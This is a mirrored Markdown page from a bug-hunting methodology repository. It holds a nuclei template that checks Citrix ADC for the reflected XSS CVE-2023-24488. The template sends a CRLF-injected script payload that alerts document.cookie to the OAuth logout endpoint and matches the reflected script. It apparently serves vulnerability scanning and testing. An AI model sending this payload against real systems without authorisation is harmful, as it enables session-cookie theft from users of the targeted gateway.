mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-22 19:53:10 +00:00
46 lines
1.3 KiB
Markdown
46 lines
1.3 KiB
Markdown
|
# 🎯 XSS nuclei template CVE-2023-24488.yaml
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
id: CVE-2023-24488
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: CVE-2023-24488
|
||
|
|
author: assetnote
|
||
|
|
severity: medium
|
||
|
|
description: description
|
||
|
|
reference:
|
||
|
|
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
|
||
|
|
tags: tags
|
||
|
|
|
||
|
|
requests:
|
||
|
|
- raw:
|
||
|
|
- |+
|
||
|
|
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Cookie: NSC_TASS=/Citrix
|
||
|
|
Cache-Control: max-age=0
|
||
|
|
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
|
||
|
|
Sec-Ch-Ua-Mobile: ?0
|
||
|
|
Sec-Ch-Ua-Platform: "Windows"
|
||
|
|
Upgrade-Insecure-Requests: 1
|
||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
|
||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
|
||
|
|
Sec-Gpc: 1
|
||
|
|
Accept-Language: en-GB,en
|
||
|
|
Sec-Fetch-Site: none
|
||
|
|
Sec-Fetch-Mode: navigate
|
||
|
|
Sec-Fetch-User: ?1
|
||
|
|
Sec-Fetch-Dest: document
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Connection: close
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: word
|
||
|
|
part: body
|
||
|
|
words:
|
||
|
|
- <script>alert(document.cookie)</script>
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 302
|
||
|
|
```
|